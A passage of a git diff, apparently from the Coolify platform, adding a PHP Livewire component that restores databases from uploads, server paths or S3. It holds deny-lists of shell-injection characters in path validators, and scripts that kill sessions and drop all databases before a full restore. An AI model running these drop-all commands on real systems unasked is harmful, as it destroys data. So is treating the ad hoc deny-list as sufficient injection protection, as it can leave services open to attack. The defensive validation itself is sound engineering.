-            // 4. Check file exists in S3 (bucket and path already validated above)
-            $escapedBucket = escapeshellarg($bucket);
-            $escapedCleanPath = escapeshellarg($cleanPath);
-            $escapedS3Source = escapeshellarg("s3temp/{$bucket}/{$cleanPath}");
-            $commands[] = "docker exec {$containerName} mc stat {$escapedS3Source}";
-
-            // 5. Download from S3 to helper container (progress shown by default)
-            $escapedHelperTmpPath = escapeshellarg($helperTmpPath);
-            $commands[] = "docker exec {$containerName} mc cp {$escapedS3Source} {$escapedHelperTmpPath}";
-
-            // 6. Copy from helper to server, then immediately to database container
-            $commands[] = "docker cp {$containerName}:{$helperTmpPath} {$serverTmpPath}";
-            $commands[] = "docker cp {$serverTmpPath} {$this->container}:{$containerTmpPath}";
-
-            // 7. Cleanup helper container and server temp file immediately (no longer needed)
-            $commands[] = "docker rm -f {$containerName} 2>/dev/null || true";
-            $commands[] = "rm -f {$serverTmpPath} 2>/dev/null || true";
-
-            // 8. Build and execute restore command inside database container
-            $restoreCommand = $this->buildRestoreCommand($containerTmpPath);
-
-            $restoreCommandBase64 = base64_encode($restoreCommand);
-            $commands[] = "echo \"{$restoreCommandBase64}\" | base64 -d > {$scriptPath}";
-            $commands[] = "chmod +x {$scriptPath}";
-            $commands[] = "docker cp {$scriptPath} {$this->container}:{$scriptPath}";
-
-            // 9. Execute restore and cleanup temp files immediately after completion
-            $commands[] = "docker exec {$this->container} sh -c '{$scriptPath} && rm -f {$containerTmpPath} {$scriptPath}'";
-            $commands[] = "docker exec {$this->container} sh -c 'echo \"Import finished with exit code $?\"'";
-
-            // Execute all commands with cleanup event (as safety net for edge cases)
-            $activity = remote_process($commands, $this->server, ignore_errors: true, callEventOnFinish: 'S3RestoreJobFinished', callEventData: [
-                'containerName' => $containerName,
-                'serverTmpPath' => $serverTmpPath,
-                'scriptPath' => $scriptPath,
-                'containerTmpPath' => $containerTmpPath,
-                'container' => $this->container,
-                'serverId' => $this->server->id,
-            ]);
-
-            // Track the activity ID
-            $this->activityId = $activity->id;
-
-            // Dispatch activity to the monitor and open slide-over
-            $this->dispatch('activityMonitor', $activity->id);
-            $this->dispatch('databaserestore');
-            $this->dispatch('info', 'Restoring database from S3. Progress will be shown in the activity monitor...');
-        } catch (\Throwable $e) {
-            $this->importRunning = false;
-            handleError($e, $this);
-
-            return true;
-        }
-
-        return true;
-    }
-
-    public function buildRestoreCommand(string $tmpPath): string
-    {
-        $morphClass = $this->resource->getMorphClass();
-
-        // Handle ServiceDatabase by checking the database type
-        if ($morphClass === ServiceDatabase::class) {
-            $dbType = $this->resource->databaseType();
-            if (str_contains($dbType, 'mysql')) {
-                $morphClass = 'mysql';
-            } elseif (str_contains($dbType, 'mariadb')) {
-                $morphClass = 'mariadb';
-            } elseif (str_contains($dbType, 'postgres')) {
-                $morphClass = 'postgresql';
-            } elseif (str_contains($dbType, 'mongo')) {
-                $morphClass = 'mongodb';
-            }
-        }
-
-        switch ($morphClass) {
-            case StandaloneMariadb::class:
-            case 'mariadb':
-                $restoreCommand = $this->mariadbRestoreCommand;
-                if ($this->dumpAll) {
-                    $restoreCommand .= " && (gunzip -cf {$tmpPath} 2>/dev/null || cat {$tmpPath}) | mariadb -u root -p\$MARIADB_ROOT_PASSWORD \${MARIADB_DATABASE:-default}";
-                } else {
-                    $restoreCommand .= " < {$tmpPath}";
-                }
-                break;
-            case StandaloneMysql::class:
-            case 'mysql':
-                $restoreCommand = $this->mysqlRestoreCommand;
-                if ($this->dumpAll) {
-                    $restoreCommand .= " && (gunzip -cf {$tmpPath} 2>/dev/null || cat {$tmpPath}) | mysql -u root -p\$MYSQL_ROOT_PASSWORD \${MYSQL_DATABASE:-default}";
-                } else {
-                    $restoreCommand .= " < {$tmpPath}";
-                }
-                break;
-            case StandalonePostgresql::class:
-            case 'postgresql':
-                $restoreCommand = $this->postgresqlRestoreCommand;
-                if ($this->dumpAll) {
-                    $restoreCommand .= " && (gunzip -cf {$tmpPath} 2>/dev/null || cat {$tmpPath}) | psql -U \${POSTGRES_USER} -d \${POSTGRES_DB:-\${POSTGRES_USER:-postgres}}";
-                } else {
-                    $restoreCommand .= " {$tmpPath}";
-                }
-                break;
-            case StandaloneMongodb::class:
-            case 'mongodb':
-                $restoreCommand = $this->mongodbRestoreCommand;
-                if ($this->dumpAll === false) {
-                    $restoreCommand .= "{$tmpPath}";
-                }
-                break;
-            default:
-                $restoreCommand = '';
-        }
-
-        return $restoreCommand;
+        return false;
     }
 }
diff --git a/app/Livewire/Project/Database/ImportForm.php b/app/Livewire/Project/Database/ImportForm.php
new file mode 100644
index 000000000..1d394af87
--- /dev/null
+++ b/app/Livewire/Project/Database/ImportForm.php
@@ -0,0 +1,821 @@
+<?php
+
+namespace App\Livewire\Project\Database;
+
+use App\Models\S3Storage;
+use App\Models\Server;
+use App\Models\Service;
+use App\Models\ServiceDatabase;
+use App\Models\StandaloneClickhouse;
+use App\Models\StandaloneDragonfly;
+use App\Models\StandaloneKeydb;
+use App\Models\StandaloneMariadb;
+use App\Models\StandaloneMongodb;
+use App\Models\StandaloneMysql;
+use App\Models\StandalonePostgresql;
+use App\Models\StandaloneRedis;
+use App\Support\ValidationPatterns;
+use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
+use Illuminate\Support\Facades\Storage;
+use Livewire\Attributes\Computed;
+use Livewire\Attributes\Locked;
+use Livewire\Component;
+
+class ImportForm extends Component
+{
+    use AuthorizesRequests;
+
+    /**
+     * Validate that a string is safe for use as an S3 bucket name.
+     * Allows alphanumerics, dots, dashes, and underscores.
+     */
+    private function validateBucketName(string $bucket): bool
+    {
+        return preg_match('/^[a-zA-Z0-9.\-_]+$/', $bucket) === 1;
+    }
+
+    /**
+     * Validate that a string is safe for use as an S3 path.
+     * Allows alphanumerics, dots, dashes, underscores, slashes, and common file characters.
+     */
+    private function validateS3Path(string $path): bool
+    {
+        // Must not be empty
+        if (empty($path)) {
+            return false;
+        }
+
+        // Must not contain dangerous shell metacharacters or command injection patterns
+        $dangerousPatterns = [
+            '..', // Directory traversal
+            '$(', // Command substitution
+            '`',  // Backtick command substitution
+            '|',  // Pipe
+            ';',  // Command separator
+            '&',  // Background/AND
+            '>',  // Redirect
+            '<',  // Redirect
+            "\n", // Newline
+            "\r", // Carriage return
+            "\0", // Null byte
+            "'",  // Single quote
+            '"',  // Double quote
+            '\\', // Backslash
+        ];
+
+        foreach ($dangerousPatterns as $pattern) {
+            if (str_contains($path, $pattern)) {
+                return false;
+            }
+        }
+
+        // Allow alphanumerics, dots, dashes, underscores, slashes, spaces, plus, equals, at
+        return preg_match('/^[a-zA-Z0-9.\-_\/\s+@=]+$/', $path) === 1;
+    }
+
+    /**
+     * Validate that a string is safe for use as a file path on the server.
+     */
+    private function validateServerPath(string $path): bool
+    {
+        // Must be an absolute path
+        if (! str_starts_with($path, '/')) {
+            return false;
+        }
+
+        // Must not contain dangerous shell metacharacters or command injection patterns
+        $dangerousPatterns = [
+            '..', // Directory traversal
+            '$(', // Command substitution
+            '`',  // Backtick command substitution
+            '|',  // Pipe
+            ';',  // Command separator
+            '&',  // Background/AND
+            '>',  // Redirect
+            '<',  // Redirect
+            "\n", // Newline
+            "\r", // Carriage return
+            "\0", // Null byte
+            "'",  // Single quote
+            '"',  // Double quote
+            '\\', // Backslash
+        ];
+
+        foreach ($dangerousPatterns as $pattern) {
+            if (str_contains($path, $pattern)) {
+                return false;
+            }
+        }
+
+        // Allow alphanumerics, dots, dashes, underscores, slashes, and spaces
+        return preg_match('/^[a-zA-Z0-9.\-_\/\s]+$/', $path) === 1;
+    }
+
+    public bool $unsupported = false;
+
+    // Store IDs instead of models for proper Livewire serialization
+    #[Locked]
+    public ?int $resourceId = null;
+
+    #[Locked]
+    public ?string $resourceType = null;
+
+    #[Locked]
+    public ?int $serverId = null;
+
+    // View-friendly properties to avoid computed property access in Blade
+    #[Locked]
+    public string $resourceUuid = '';
+
+    public string $resourceStatus = '';
+
+    #[Locked]
+    public string $resourceDbType = '';
+
+    public array $parameters = [];
+
+    public array $containers = [];
+
+    public bool $scpInProgress = false;
+
+    public bool $importRunning = false;
+
+    public ?string $filename = null;
+
+    public ?string $filesize = null;
+
+    public bool $isUploading = false;
+
+    public int $progress = 0;
+
+    public bool $error = false;
+
+    #[Locked]
+    public string $container;
+
+    public array $importCommands = [];
+
+    public bool $dumpAll = false;
+
+    public string $restoreCommandText = '';
+
+    public string $customLocation = '';
+
+    public ?int $activityId = null;
+
+    public string $postgresqlRestoreCommand = 'pg_restore -U $POSTGRES_USER -d ${POSTGRES_DB:-${POSTGRES_USER:-postgres}}';
+
+    public string $mysqlRestoreCommand = 'mysql -u $MYSQL_USER -p$MYSQL_PASSWORD $MYSQL_DATABASE';
+
+    public string $mariadbRestoreCommand = 'mariadb -u $MARIADB_USER -p$MARIADB_PASSWORD $MARIADB_DATABASE';
+
+    public string $mongodbRestoreCommand = 'mongorestore --authenticationDatabase=admin --username $MONGO_INITDB_ROOT_USERNAME --password $MONGO_INITDB_ROOT_PASSWORD --uri mongodb://localhost:27017 --gzip --archive=';
+
+    // S3 Restore properties
+    public array $availableS3Storages = [];
+
+    public ?int $s3StorageId = null;
+
+    public string $s3Path = '';
+
+    public ?int $s3FileSize = null;
+
+    #[Computed]
+    public function resource()
+    {
+        if ($this->resourceId === null || $this->resourceType === null) {
+            return null;
+        }
+
+        return $this->resourceType::find($this->resourceId);
+    }
+
+    #[Computed]
+    public function server()
+    {
+        if ($this->serverId === null) {
+            return null;
+        }
+
+        return Server::ownedByCurrentTeam()->find($this->serverId);
+    }
+
+    protected $listeners = [
+        'slideOverClosed' => 'resetActivityId',
+    ];
+
+    public function resetActivityId()
+    {
+        $this->activityId = null;
+    }
+
+    public function mount()
+    {
+        $this->parameters = get_route_parameters();
+        $this->getContainers();
+        $this->loadAvailableS3Storages();
+    }
+
+    public function updatedDumpAll($value)
+    {
+        $morphClass = $this->resource->getMorphClass();
+
+        // Handle ServiceDatabase by checking the database type
+        if ($morphClass === ServiceDatabase::class) {
+            $dbType = $this->resource->databaseType();
+            if (str_contains($dbType, 'mysql')) {
+                $morphClass = 'mysql';
+            } elseif (str_contains($dbType, 'mariadb')) {
+                $morphClass = 'mariadb';
+            } elseif (str_contains($dbType, 'postgres')) {
+                $morphClass = 'postgresql';
+            }
+        }
+
+        switch ($morphClass) {
+            case StandaloneMariadb::class:
+            case 'mariadb':
+                if ($value === true) {
+                    $this->mariadbRestoreCommand = <<<'EOD'
+for pid in $(mariadb -u root -p$MARIADB_ROOT_PASSWORD -N -e "SELECT id FROM information_schema.processlist WHERE user != 'root';"); do
+  mariadb -u root -p$MARIADB_ROOT_PASSWORD -e "KILL $pid" 2>/dev/null || true
+done && \
+mariadb -u root -p$MARIADB_ROOT_PASSWORD -N -e "SELECT CONCAT('DROP DATABASE IF EXISTS \`',schema_name,'\`;') FROM information_schema.schemata WHERE schema_name NOT IN ('information_schema','mysql','performance_schema','sys');" | mariadb -u root -p$MARIADB_ROOT_PASSWORD && \
+mariadb -u root -p$MARIADB_ROOT_PASSWORD -e "CREATE DATABASE IF NOT EXISTS \`${MARIADB_DATABASE:-default}\`;" && \
+(gunzip -cf $tmpPath 2>/dev/null || cat $tmpPath) | sed -e '/^CREATE DATABASE/d' -e '/^USE \`mysql\`/d' | mariadb -u root -p$MARIADB_ROOT_PASSWORD ${MARIADB_DATABASE:-default}
+EOD;
+                    $this->restoreCommandText = $this->mariadbRestoreCommand.' && (gunzip -cf <temp_backup_file> 2>/dev/null || cat <temp_backup_file>) | mariadb -u root -p$MARIADB_ROOT_PASSWORD ${MARIADB_DATABASE:-default}';
+                } else {
+                    $this->mariadbRestoreCommand = 'mariadb -u $MARIADB_USER -p$MARIADB_PASSWORD $MARIADB_DATABASE';
+                }
+                break;
+            case StandaloneMysql::class:
+            case 'mysql':
+                if ($value === true) {
+                    $this->mysqlRestoreCommand = <<<'EOD'
+for pid in $(mysql -u root -p$MYSQL_ROOT_PASSWORD -N -e "SELECT id FROM information_schema.processlist WHERE user != 'root';"); do
+  mysql -u root -p$MYSQL_ROOT_PASSWORD -e "KILL $pid" 2>/dev/null || true
+done && \
+mysql -u root -p$MYSQL_ROOT_PASSWORD -N -e "SELECT CONCAT('DROP DATABASE IF EXISTS \`',schema_name,'\`;') FROM information_schema.schemata WHERE schema_name NOT IN ('information_schema','mysql','performance_schema','sys');" | mysql -u root -p$MYSQL_ROOT_PASSWORD && \
+mysql -u root -p$MYSQL_ROOT_PASSWORD -e "CREATE DATABASE IF NOT EXISTS \`${MYSQL_DATABASE:-default}\`;" && \
+(gunzip -cf $tmpPath 2>/dev/null || cat $tmpPath) | sed -e '/^CREATE DATABASE/d' -e '/^USE \`mysql\`/d' | mysql -u root -p$MYSQL_ROOT_PASSWORD ${MYSQL_DATABASE:-default}
+EOD;
+                    $this->restoreCommandText = $this->mysqlRestoreCommand.' && (gunzip -cf <temp_backup_file> 2>/dev/null || cat <temp_backup_file>) | mysql -u root -p$MYSQL_ROOT_PASSWORD ${MYSQL_DATABASE:-default}';
+                } else {
+                    $this->mysqlRestoreCommand = 'mysql -u $MYSQL_USER -p$MYSQL_PASSWORD $MYSQL_DATABASE';
+                }
+                break;
+            case StandalonePostgresql::class:
+            case 'postgresql':
+                if ($value === true) {
+                    $this->postgresqlRestoreCommand = <<<'EOD'
+psql -U ${POSTGRES_USER} -c "SELECT pg_terminate_backend(pid) FROM pg_stat_activity WHERE datname IS NOT NULL AND pid <> pg_backend_pid()" && \
+psql -U ${POSTGRES_USER} -t -c "SELECT datname FROM pg_database WHERE NOT datistemplate" | xargs -I {} dropdb -U ${POSTGRES_USER} --if-exists {} && \
+createdb -U ${POSTGRES_USER} ${POSTGRES_DB:-${POSTGRES_USER:-postgres}}
+EOD;
+                    $this->restoreCommandText = $this->postgresqlRestoreCommand.' && (gunzip -cf <temp_backup_file> 2>/dev/null || cat <temp_backup_file>) | psql -U ${POSTGRES_USER} -d ${POSTGRES_DB:-${POSTGRES_USER:-postgres}}';
+                } else {
+                    $this->postgresqlRestoreCommand = 'pg_restore -U ${POSTGRES_USER} -d ${POSTGRES_DB:-${POSTGRES_USER:-postgres}}';
+                }
+                break;
+        }
+
+    }
+
+    public function getContainers()
+    {
+        $this->containers = [];
+        $teamId = data_get(auth()->user()->currentTeam(), 'id');
+
+        // Try to find resource by route parameter
+        $databaseUuid = data_get($this->parameters, 'database_uuid');
+        $stackServiceUuid = data_get($this->parameters, 'stack_service_uuid');
+
+        $resource = null;
+        if ($databaseUuid) {
+            // Standalone database route
+            $resource = getResourceByUuid($databaseUuid, $teamId);
+            if (is_null($resource)) {
+                abort(404);
+            }
+        } elseif ($stackServiceUuid) {
+            // ServiceDatabase route - look up the service database
+            $serviceUuid = data_get($this->parameters, 'service_uuid');
+            $project = currentTeam()
+                ->projects()
+                ->select('id', 'uuid', 'team_id')
+                ->where('uuid', data_get($this->parameters, 'project_uuid'))
+                ->firstOrFail();
+            $environment = $project->environments()
+                ->select('id', 'uuid', 'name', 'project_id')
+                ->where('uuid', data_get($this->parameters, 'environment_uuid'))
+                ->firstOrFail();
+            $service = $environment->services()->whereUuid($serviceUuid)->firstOrFail();
+            $resource = $service->databases()->whereUuid($stackServiceUuid)->first();
+            if (is_null($resource)) {
+                abort(404);
+            }
+        } else {
+            abort(404);
+        }
+
+        $this->authorize('view', $resource);
+
+        // Store IDs for Livewire serialization
+        $this->resourceId = $resource->id;
+        $this->resourceType = get_class($resource);
+
+        // Store view-friendly properties
+        $this->resourceStatus = $resource->status ?? '';
+
+        // Handle ServiceDatabase server access differently
+        if ($resource->getMorphClass() === ServiceDatabase::class) {
+            $server = $resource->service?->server;
+            if (! $server) {
+                abort(404, 'Server not found for this service database.');
+            }
+            $this->serverId = $server->id;
+            $this->container = $resource->name.'-'.$resource->service->uuid;
+            $this->resourceUuid = $resource->uuid; // Use ServiceDatabase's own UUID
+
+            // Determine database type for ServiceDatabase
+            $dbType = $resource->databaseType();
+            if (str_contains($dbType, 'postgres')) {
+                $this->resourceDbType = 'standalone-postgresql';
+            } elseif (str_contains($dbType, 'mysql')) {
+                $this->resourceDbType = 'standalone-mysql';
+            } elseif (str_contains($dbType, 'mariadb')) {
+                $this->resourceDbType = 'standalone-mariadb';
+            } elseif (str_contains($dbType, 'mongo')) {
+                $this->resourceDbType = 'standalone-mongodb';
+            } else {
+                $this->resourceDbType = $dbType;
+            }
+        } else {
+            $server = $resource->destination?->server;
+            if (! $server) {
+                abort(404, 'Server not found for this database.');
+            }
+            $this->serverId = $server->id;
+            $this->container = $resource->uuid;
+            $this->resourceUuid = $resource->uuid;
+            $this->resourceDbType = $resource->type();
+        }
+
+        if (str($resource->status)->startsWith('running')) {
+            $this->containers[] = $this->container;
+        }
+
+        if (
+            $resource->getMorphClass() === StandaloneRedis::class ||
+            $resource->getMorphClass() === StandaloneKeydb::class ||
+            $resource->getMorphClass() === StandaloneDragonfly::class ||
+            $resource->getMorphClass() === StandaloneClickhouse::class
+        ) {
+            $this->unsupported = true;
+        }
+
+        // Mark unsupported ServiceDatabase types (Redis, KeyDB, etc.)
+        if ($resource->getMorphClass() === ServiceDatabase::class) {
+            $dbType = $resource->databaseType();
+            if (str_contains($dbType, 'redis') || str_contains($dbType, 'keydb') ||
+                str_contains($dbType, 'dragonfly') || str_contains($dbType, 'clickhouse')) {
+                $this->unsupported = true;
+            }
+        }
+    }
+
+    public function checkFile()
+    {
+        if (filled($this->customLocation)) {
+            // Validate the custom location to prevent command injection
+            if (! $this->validateServerPath($this->customLocation)) {
+                $this->dispatch('error', 'Invalid file path. Path must be absolute and contain only safe characters (alphanumerics, dots, dashes, underscores, slashes).');
+
+                return;
+            }
+
+            if (! $this->server) {
+                $this->dispatch('error', 'Server not found. Please refresh the page.');
+
+                return;
+            }
+
+            try {
+                $escapedPath = escapeshellarg($this->customLocation);
+                $result = instant_remote_process(["ls -l {$escapedPath}"], $this->server, throwError: false);
+                if (blank($result)) {
+                    $this->dispatch('error', 'The file does not exist or has been deleted.');
+
+                    return;
+                }
+                $this->filename = $this->customLocation;
+                $this->dispatch('success', 'The file exists.');
+            } catch (\Throwable $e) {
+                return handleError($e, $this);
+            }
+        }
+    }
+
+    public function runImport(string $password = ''): bool|string
+    {
+        if (! verifyPasswordConfirmation($password, $this)) {
+            return 'The provided password is incorrect.';
+        }
+
+        $this->authorize('update', $this->resource);
+
+        if (! ValidationPatterns::isValidContainerName($this->container)) {
+            $this->dispatch('error', 'Invalid container name.');
+
+            return true;
+        }
+
+        if ($this->filename === '') {
+            $this->dispatch('error', 'Please select a file to import.');
+
+            return true;
+        }
+
+        if (! $this->server) {
+            $this->dispatch('error', 'Server not found. Please refresh the page.');
+
+            return true;
+        }
+
+        try {
+            $this->importRunning = true;
+            $this->importCommands = [];
+            $backupFileName = "upload/{$this->resourceUuid}/restore";
+
+            // Check if an uploaded file exists first (takes priority over custom location)
+            if (Storage::exists($backupFileName)) {
+                $path = Storage::path($backupFileName);
+                $tmpPath = '/tmp/'.basename($backupFileName).'_'.$this->resourceUuid;
+                instant_scp($path, $tmpPath, $this->server);
+                Storage::delete($backupFileName);
+                $this->importCommands[] = "docker cp {$tmpPath} {$this->container}:{$tmpPath}";
+            } elseif (filled($this->customLocation)) {
+                // Validate the custom location to prevent command injection
+                if (! $this->validateServerPath($this->customLocation)) {
+                    $this->dispatch('error', 'Invalid file path. Path must be absolute and contain only safe characters.');
+
+                    return true;
+                }
+                $tmpPath = '/tmp/restore_'.$this->resourceUuid;
+                $escapedCustomLocation = escapeshellarg($this->customLocation);
+                $this->importCommands[] = "docker cp {$escapedCustomLocation} {$this->container}:{$tmpPath}";
+            } else {
+                $this->dispatch('error', 'The file does not exist or has been deleted.');
+
+                return true;
+            }
+
+            // Copy the restore command to a script file
+            $scriptPath = "/tmp/restore_{$this->resourceUuid}.sh";
+
+            $restoreCommand = $this->buildRestoreCommand($tmpPath);
+
+            $restoreCommandBase64 = base64_encode($restoreCommand);
+            $this->importCommands[] = "echo \"{$restoreCommandBase64}\" | base64 -d > {$scriptPath}";
+            $this->importCommands[] = "chmod +x {$scriptPath}";
+            $this->importCommands[] = "docker cp {$scriptPath} {$this->container}:{$scriptPath}";
+
+            $this->importCommands[] = "docker exec {$this->container} sh -c '{$scriptPath}'";
+            $this->importCommands[] = "docker exec {$this->container} sh -c 'echo \"Import finished with exit code $?\"'";
+
+            if (! empty($this->importCommands)) {
+                $activity = remote_process($this->importCommands, $this->server, ignore_errors: true, callEventOnFinish: 'RestoreJobFinished', callEventData: [
+                    'scriptPath' => $scriptPath,
+                    'tmpPath' => $tmpPath,
+                    'container' => $this->container,
+                    'serverId' => $this->server->id,
+                ]);
+
+                // Track the activity ID
+                $this->activityId = $activity->id;
+
+                // Dispatch activity to the monitor and open slide-over
+                $this->dispatch('activityMonitor', $activity->id);
+                $this->dispatch('databaserestore');
+            }
+        } catch (\Throwable $e) {
+            handleError($e, $this);
+
+            return true;
+        } finally {
+            $this->filename = null;
+            $this->importCommands = [];
+        }
+
+        return true;
+    }
+
+    public function loadAvailableS3Storages()
+    {
+        try {
+            $this->availableS3Storages = S3Storage::ownedByCurrentTeam(['id', 'name', 'description'])
+                ->where('is_usable', true)
+                ->get()
+                ->map(fn ($s) => ['id' => $s->id, 'name' => $s->name, 'description' => $s->description])
+                ->toArray();
+        } catch (\Throwable $e) {
+            $this->availableS3Storages = [];
+        }
+    }
+
+    public function updatedS3Path($value)
+    {
+        // Reset validation state when path changes
+        $this->s3FileSize = null;
+
+        // Ensure path starts with a slash
+        if ($value !== null && $value !== '') {
+            $this->s3Path = str($value)->trim()->start('/')->value();
+        }
+    }
+
+    public function updatedS3StorageId()
+    {
+        // Reset validation state when storage changes
+        $this->s3FileSize = null;
+    }
+
+    public function checkS3File()
+    {
+        if (! $this->s3StorageId) {
+            $this->dispatch('error', 'Please select an S3 storage.');
+
+            return;
+        }
+
+        if (blank($this->s3Path)) {
+            $this->dispatch('error', 'Please provide an S3 path.');
+
+            return;
+        }
+
+        // Clean the path (remove leading slash if present)
+        $cleanPath = ltrim($this->s3Path, '/');
+
+        // Validate the S3 path early to prevent command injection in subsequent operations
+        if (! $this->validateS3Path($cleanPath)) {
+            $this->dispatch('error', 'Invalid S3 path. Path must contain only safe characters (alphanumerics, dots, dashes, underscores, slashes).');
+
+            return;
+        }
+
+        try {
+            $s3Storage = S3Storage::ownedByCurrentTeam()->findOrFail($this->s3StorageId);
+
+            // Validate bucket name early
+            if (! $this->validateBucketName($s3Storage->bucket)) {
+                $this->dispatch('error', 'Invalid S3 bucket name. Bucket name must contain only alphanumerics, dots, dashes, and underscores.');
+
+                return;
+            }
+
+            // Test connection
+            $s3Storage->testConnection();
+
+            // Build S3 disk configuration
+            $disk = Storage::build([
+                'driver' => 's3',
+                'region' => $s3Storage->region,
+                'key' => $s3Storage->key,
+                'secret' => $s3Storage->secret,
+                'bucket' => $s3Storage->bucket,
+                'endpoint' => $s3Storage->endpoint,
+                'use_path_style_endpoint' => true,
+            ]);
+
+            // Check if file exists
+            if (! $disk->exists($cleanPath)) {
+                $this->dispatch('error', 'File not found in S3. Please check the path.');
+
+                return;
+            }
+
+            // Get file size
+            $this->s3FileSize = $disk->size($cleanPath);
+
+            $this->dispatch('success', 'File found in S3. Size: '.formatBytes($this->s3FileSize));
+        } catch (\Throwable $e) {
+            $this->s3FileSize = null;
+
+            return handleError($e, $this);
+        }
+    }
+
+    public function restoreFromS3(string $password = ''): bool|string
+    {
+        if (! verifyPasswordConfirmation($password, $this)) {
+            return 'The provided password is incorrect.';
+        }
+
+        $this->authorize('update', $this->resource);
+
+        if (! ValidationPatterns::isValidContainerName($this->container)) {
+            $this->dispatch('error', 'Invalid container name.');
+
+            return true;
+        }
+
+        if (! $this->s3StorageId || blank($this->s3Path)) {
+            $this->dispatch('error', 'Please select S3 storage and provide a path first.');
+
+            return true;
+        }
+
+        if (is_null($this->s3FileSize)) {
+            $this->dispatch('error', 'Please check the file first by clicking "Check File".');
+
+            return true;
+        }
+
+        if (! $this->server) {
+            $this->dispatch('error', 'Server not found. Please refresh the page.');
+
+            return true;
+        }
+
+        try {
+            $this->importRunning = true;
+
+            $s3Storage = S3Storage::ownedByCurrentTeam()->findOrFail($this->s3StorageId);
+
+            $key = $s3Storage->key;
+            $secret = $s3Storage->secret;
+            $bucket = $s3Storage->bucket;
+            $endpoint = $s3Storage->endpoint;
+
+            // Validate bucket name to prevent command injection
+            if (! $this->validateBucketName($bucket)) {
+                $this->dispatch('error', 'Invalid S3 bucket name. Bucket name must contain only alphanumerics, dots, dashes, and underscores.');
+
+                return true;
+            }
+
+            // Clean the S3 path
+            $cleanPath = ltrim($this->s3Path, '/');
+
+            // Validate the S3 path to prevent command injection
+            if (! $this->validateS3Path($cleanPath)) {
+                $this->dispatch('error', 'Invalid S3 path. Path must contain only safe characters (alphanumerics, dots, dashes, underscores, slashes).');
+
+                return true;
+            }
+
+            // Get helper image
+            $helperImage = config('constants.coolify.helper_image');
+            $latestVersion = getHelperVersion();
+            $fullImageName = "{$helperImage}:{$latestVersion}";
+
+            // Get the database destination network
+            if ($this->resource->getMorphClass() === ServiceDatabase::class) {
+                $destinationNetwork = $this->resource->service->destination->network ?? 'coolify';
+            } else {
+                $destinationNetwork = $this->resource->destination->network ?? 'coolify';
+            }
+
+            // Generate unique names for this operation
+            $containerName = "s3-restore-{$this->resourceUuid}";
+            $helperTmpPath = '/tmp/'.basename($cleanPath);
+            $serverTmpPath = "/tmp/s3-restore-{$this->resourceUuid}-".basename($cleanPath);
+            $containerTmpPath = "/tmp/restore_{$this->resourceUuid}-".basename($cleanPath);
+            $scriptPath = "/tmp/restore_{$this->resourceUuid}.sh";
+
+            // Prepare all commands in sequence
+            $commands = [];
+
+            // 1. Clean up any existing helper container and temp files from previous runs
+            $commands[] = "docker rm -f {$containerName} 2>/dev/null || true";
+            $commands[] = "rm -f {$serverTmpPath} 2>/dev/null || true";
+            $commands[] = "docker exec {$this->container} rm -f {$containerTmpPath} {$scriptPath} 2>/dev/null || true";
+
+            // 2. Start helper container on the database network
+            $commands[] = "docker run -d --network {$destinationNetwork} --name {$containerName} {$fullImageName} sleep 3600";
+
+            // 3. Configure S3 access in helper container
+            $escapedEndpoint = escapeshellarg($endpoint);
+            $escapedKey = escapeshellarg($key);
+            $escapedSecret = escapeshellarg($secret);
+            $commands[] = "docker exec {$containerName} mc alias set s3temp {$escapedEndpoint} {$escapedKey} {$escapedSecret}";
+
+            // 4. Check file exists in S3 (bucket and path already validated above)
+            $escapedBucket = escapeshellarg($bucket);
+            $escapedCleanPath = escapeshellarg($cleanPath);
+            $escapedS3Source = escapeshellarg("s3temp/{$bucket}/{$cleanPath}");
+            $commands[] = "docker exec {$containerName} mc stat {$escapedS3Source}";
+
+            // 5. Download from S3 to helper container (progress shown by default)
+            $escapedHelperTmpPath = escapeshellarg($helperTmpPath);
+            $commands[] = "docker exec {$containerName} mc cp {$escapedS3Source} {$escapedHelperTmpPath}";
+
+            // 6. Copy from helper to server, then immediately to database container
+            $commands[] = "docker cp {$containerName}:{$helperTmpPath} {$serverTmpPath}";
+            $commands[] = "docker cp {$serverTmpPath} {$this->container}:{$containerTmpPath}";
+
+            // 7. Cleanup helper container and server temp file immediately (no longer needed)
+            $commands[] = "docker rm -f {$containerName} 2>/dev/null || true";
+            $commands[] = "rm -f {$serverTmpPath} 2>/dev/null || true";
+
+            // 8. Build and execute restore command inside database container
+            $restoreCommand = $this->buildRestoreCommand($containerTmpPath);
+
+            $restoreCommandBase64 = base64_encode($restoreCommand);
+            $commands[] = "echo \"{$restoreCommandBase64}\" | base64 -d > {$scriptPath}";
+            $commands[] = "chmod +x {$scriptPath}";
+            $commands[] = "docker cp {$scriptPath} {$this->container}:{$scriptPath}";
+
+            // 9. Execute restore and cleanup temp files immediately after completion
+            $commands[] = "docker exec {$this->container} sh -c '{$scriptPath} && rm -f {$containerTmpPath} {$scriptPath}'";
+            $commands[] = "docker exec {$this->container} sh -c 'echo \"Import finished with exit code $?\"'";
+
+            // Execute all commands with cleanup event (as safety net for edge cases)
+            $activity = remote_process($commands, $this->server, ignore_errors: true, callEventOnFinish: 'S3RestoreJobFinished', callEventData: [
+                'containerName' => $containerName,
+                'serverTmpPath' => $serverTmpPath,
+                'scriptPath' => $scriptPath,
+                'containerTmpPath' => $containerTmpPath,
+                'container' => $this->container,
+                'serverId' => $this->server->id,
+            ]);
+
+            // Track the activity ID
+            $this->activityId = $activity->id;
+
+            // Dispatch activity to the monitor and open slide-over
+            $this->dispatch('activityMonitor', $activity->id);
+            $this->dispatch('databaserestore');
+            $this->dispatch('info', 'Restoring database from S3. Progress will be shown in the activity monitor...');
+        } catch (\Throwable $e) {
+            $this->importRunning = false;
+            handleError($e, $this);
+
+            return true;
+        }
+
+        return true;
+    }
+
+    public function buildRestoreCommand(string $tmpPath): string
+    {
+        $morphClass = $this->resource->getMorphClass();
+
+        // Handle ServiceDatabase by checking the database type
+        if ($morphClass === ServiceDatabase::class) {
+            $dbType = $this->resource->databaseType();
+            if (str_contains($dbType, 'mysql')) {
+                $morphClass = 'mysql';
+            } elseif (str_contains($dbType, 'mariadb')) {
+                $morphClass = 'mariadb';
+            } elseif (str_contains($dbType, 'postgres')) {
+                $morphClass = 'postgresql';
+            } elseif (str_contains($dbType, 'mongo')) {
+                $morphClass = 'mongodb';
+            }
+        }
+
+        switch ($morphClass) {
+            case StandaloneMariadb::class:
+            case 'mariadb':
+                $restoreCommand = $this->mariadbRestoreCommand;
+                if ($this->dumpAll) {
